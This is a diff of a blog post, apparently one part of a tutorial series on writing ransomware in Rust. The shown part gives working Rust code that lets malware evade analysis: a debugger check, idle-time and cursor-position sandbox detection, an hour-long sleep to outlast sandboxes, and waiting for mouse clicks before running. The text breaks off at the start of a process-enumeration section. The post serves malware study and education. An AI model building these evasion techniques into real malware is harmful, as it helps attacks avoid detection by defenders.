cdong1012/cdong1012.github.io/_posts/2020-06-09-rust-ransomware1.markdown

     ```

-    * First, we check if *IsDebuggerPresent()* returns a 0 or any other number.
+    - First, we check if *IsDebuggerPresent()* returns a 0 or any other number.
 If it's 0, the program is not being debugged, so we continue to print "Hello, world!"

-    * If it's being debugged, we print the debug code out and call std::process::exit(0) to exit immediately!
+    - If it's being debugged, we print the debug code out and call std::process::exit(0) to exit immediately!

-    * Here is the result:
+    - Here is the result:

-        1. Double clicking on the executable /target/debug/Rust-Ransomware.exe.
+        - Double clicking on the executable /target/debug/Rust-Ransomware.exe.
 As you can see, the program prints out "Hello, world!"

         ![alt text](/uploads/noDebugger.JPG "No debugger")

-        1. Debugging this executable in IDA, we can set a break point where we compare eax(the return value from IsDebuggerPresent()).
+        - Debugging this executable in IDA, we can set a break point where we compare eax(the return value from IsDebuggerPresent()).
 If we execute to this point, you can see that eax = 1, so we will exit immediately!

         ![alt text](/uploads/debuggerIDA2.JPG "Debugger")

-    * There are some [ways](https://www.aldeid.com/wiki/IsDebuggerPresent) that reverse engineers can bypass this through dynamic patching or static patching the executable itself, and we can do more things to make our executable anti-patching.
+    - There are some [ways](https://www.aldeid.com/wiki/IsDebuggerPresent) that reverse engineers can bypass this through dynamic patching or static patching the executable itself, and we can do more things to make our executable anti-patching.

-    * Since I'm a bit lazy, I'm not going to attempt this, but maybe we can come back for this another time!
+    - Since I'm a bit lazy, I'm not going to attempt this, but maybe we can come back for this another time!

-- **Check for sandbox**
+### II.
+Check for sandbox
 - There are a variety of sandbox-evasion techniques.
 I'm just going to list out a few of them for us to try and implement down here.

 - If you are interested in more details, I suggest taking a look at [this research paper](https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667)

-    1. ***Timing-based techniques***
+1\. **Timing-based techniques**

-        * Idle time: The normal idle time on your PC or mine is typically really really short when we are using them.
+* ***Idle time***: The normal idle time on your PC or mine is typically really really short when we are using them.
 It's around 0.047 seconds on my laptop currently.
 For a sandbox, there won't be much action happening, and their idle time is typically really long.

     * We can check and see if the idle time is over a minute.
 If it is, we are probably in a sandbox

         ``` rust
             use winapi::um::sysinfoapi::GetTickCount;
             use winapi::um::winuser::{GetLastInputInfo, LASTINPUTINFO};

             pub fn check_idle_time() -> bool {
                 unsafe {
                     let mut last_input_info: LASTINPUTINFO = LASTINPUTINFO {
                         cbSize: std::mem::size_of::<LASTINPUTINFO>() as u32,
                         dwTime: 0u32,
                     };
                     GetLastInputInfo(&mut last_input_info);
                     let idle_time: u32 = (GetTickCount() - last_input_info.dwTime) / 1000;
                     if idle_time >= 60 {
                         return true;
                     }
                     return false;
                 }
             }

         ```

     * The idle time can be calculated by subtracting the time of the last input event(*GetLastInputInfo*) from the time since the system was started(*GetTickCount*).

     * For *GetLastInputInfo*, it takes in a pointer to a LASTINPUTINFO struct according to [MSDN](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getlastinputinfo).
 Therefore, we have to create the struct and put a 0u32 into dwTime field.
 After calling *GetLastInputInfo*, the system will write into this u32 the time of the last input event!

     * Try calling this function in main() and you will see that the *idle_time* is typically 0 or 1 on your system.

-        * Logic bomb/sleep: By implementing our malware as a logic bomb, we can stall the execution of the malware and have it sleeps.
+* ***Logic bomb/sleep***: By implementing our malware as a logic bomb, we can stall the execution of the malware and have it sleeps.
     * Typically, a sandbox analyzes a malware in around 10-20 minutes, we can just go to sleep for a couple of hours and wake up after the sandbox's processing time!

     * We also can make our malware execute at a specific date and time in the future, defeating the sandbox by waiting it out!

     * Since this does not need to be too complicated, I just let my malware sleep for an hour before executing anything.

         ``` rust

         use winapi::um::synchapi::Sleep;
         pub fn sleep_for_an_hour() {
             unsafe { Sleep(3600000) }
         }

         ```

-    2. ***Detecting user interaction***
+2\. ***Detecting user interaction***

 * Usually, users interact with their computers through mouse clicks and the keyboard, but there is extremly unlikely that there is such human-like interactions in a sandbox.

 * We can make our malware wait for a certain user interactions before executing.
 The [Trojan.APT.BaneChan](https://www.fireeye.com/blog/threat-research/2013/04/trojan-apt-banechant-in-memory-trojan-that-observes-for-multiple-mouse-clicks.html) sits and waits for a number of mouse clicks before executing its malicious code.
 I figure we can use this trick!

     ``` rust

     use winapi::um::winuser::{GetAsyncKeyState, VK_RBUTTON};
     pub fn check_mouse_click(min_clicks: u32) {
         let mut count: u32 = 0;

         while count < min_clicks {
             let key_left_clicked = unsafe { GetAsyncKeyState(VK_RBUTTON) };
             if key_left_clicked >> 15 == -1 {
                 count += 1;
             }
             unsafe { Sleep(100) };
         }
     }

     ```

 * We can also check the position of the mouse.
 Since a sandbox does not move the mouse cursor around, we can record the original position, wait for 5 seconds, and record it again.
 If the mouse position matches exactly, it's highly possible that we are in a sandbox

     ``` rust

         use winapi::um::winuser::{GetCursorPos};
         use winapi::shared::windef::POINT;
         pub fn check_cursor_position() -> bool {
             let mut cursor: POINT = POINT { x: 0i32, y: 0i32 };
             unsafe {
                 GetCursorPos(&mut cursor);
                 let x = cursor.x;
                 let y = cursor.y;
                 Sleep(5000);
                 GetCursorPos(&mut cursor);

                 if x == cursor.x && y == cursor.y {
                     return false;
                 }
             }

             true
         }

     ```

-    3. ***Running Processes and Services:***
+3\. ***Running Processes and Services:***

 * Usually, a sandbox has multiple antivirus programs, debuggers, monitoring programs running as active processes.
 Our malware can check for the availability of some of these to determine if it's being ran in a sandbox

 * In my code, I looked up how to [numerate all running processes from MSDN](https://docs.microsoft.com/en-us/windows/win32/psapi/enumerating-all-processes) and translate their C++ code into Rust.

 * Then I extract their names and compare it with a list of executable names that usually exists in sandbox environment.

     ``` rust